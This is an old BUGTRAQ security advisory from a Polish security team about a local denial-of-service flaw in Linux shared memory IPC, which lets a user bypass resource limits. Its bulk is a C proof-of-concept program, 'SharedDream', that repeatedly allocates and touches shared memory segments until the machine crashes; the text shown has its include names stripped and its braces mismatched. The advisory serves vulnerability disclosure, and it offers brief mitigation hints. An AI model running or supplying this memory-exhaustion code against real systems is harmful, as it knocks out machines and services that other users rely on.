Subject: KKIS19990914.004b: ShareDream - shared memory - ipc vulnerability To: BUGTRAQ@SECURITYFOCUS.COM ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ ### ### ### ### ### ### ### ### ### ### ###### ###### ### ### ### ### ### ### ### ### ### ### ### S E C U R I T Y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ KKI Security Team Cracow Commercial Internet http://www.security.kki.pl http://www.kki.pl mailto:security@security.kki.pl mailto:biuro@kki.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ Raport title : Shared Memory DoS - IPC vulnerability (Linux abuse as example) Problem found by : Robert Pajak (shadow@security.kki.pl), probably other ppl found that first - one of them is lcamtuf, Solar Designer is probably other... Raport created by : Robert Pajak (shadow@security.kki.pl) Lukasz Luzar (lluzar@security.kki.pl) Raport published : 14 September, 1999 Raport code : KKIS.14091999.004.b Vulnerable programs : system vulnerability... Systems affected : Linux, other (?) ... Archive : http://www.security.kki.pl/advisories/ Risk level : high ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ Useing attached program one can DoS machine even when limits are set up... This is due to fact that shared memory segments can exist without beeing bind with processes. To protect you should diable this operations, or use Solar Designer's stack patch with limits set, etc... Alan Cox has been notified... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ Local Denial of Services attack - simple bypassing limits... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ /* SharedDream - (c) Shadow, KKI Security */ /* */ /* I'm not responsible for any damaged done by this proggie... */ /* It should be used only for education... */ /* To protect - use brain, Solar's patches, or whatever... */ /* This problem is because shared memory segments can exist even */ /* if they are not combined with programs! */ /* !This program will crash your machine (localy) at kernels 2.x! */ /* If you are on kernels 2.2.x with limits run it twice :) */ /* really - even when rescource limits are set! :) */ /* Probably original idea by lcamtuf */ /* heck you should told me that you found it */ /* first ;) */ /* heh - worm greetings for for Coding Style ;) */ #include #include #include #include #define BOLD "\033[00;04m" #define BLUE "\033[00;36m" #define STAN "\033[00;00m" void main(void) { char *p; int i = 10000000; printf("\n\n"); printf(BOLD "*)" BLUE " SharedDream"STAN" - shared memory segments abuser\n"); printf(BOLD "*)\n" STAN); printf(BOLD "*)" STAN " (c) 1999" BOLD " Shadow " STAN "(" BOLD "shadow@security.kki.pl" STAN ")\n"); printf(BOLD "*)" STAN " greetz to " BOLD " vision (yo remember me), lcamtuf, kodzak, #??? ppl, Lam3rz, daworm, Trolinka, viedzmin other folks i forgot to mention\n" STAN); printf(BOLD "*)" STAN " Now it will eat up your memory even if it seems to be limited\n"); printf(BOLD "*)" STAN " Starting..."); fflush(stdout); while (1) if (p = shmat(shmget(0, i, 0777), 0, 0)) memset( p,'\0',i); // need to touch memory somehow printf(".DoW."); fflush(stdout); } else { i--; } } exit(0); } ~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright (c) 1999 KKI Security Team, Poland All rights reserved. All questions please address to mailto:security@security.kki.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~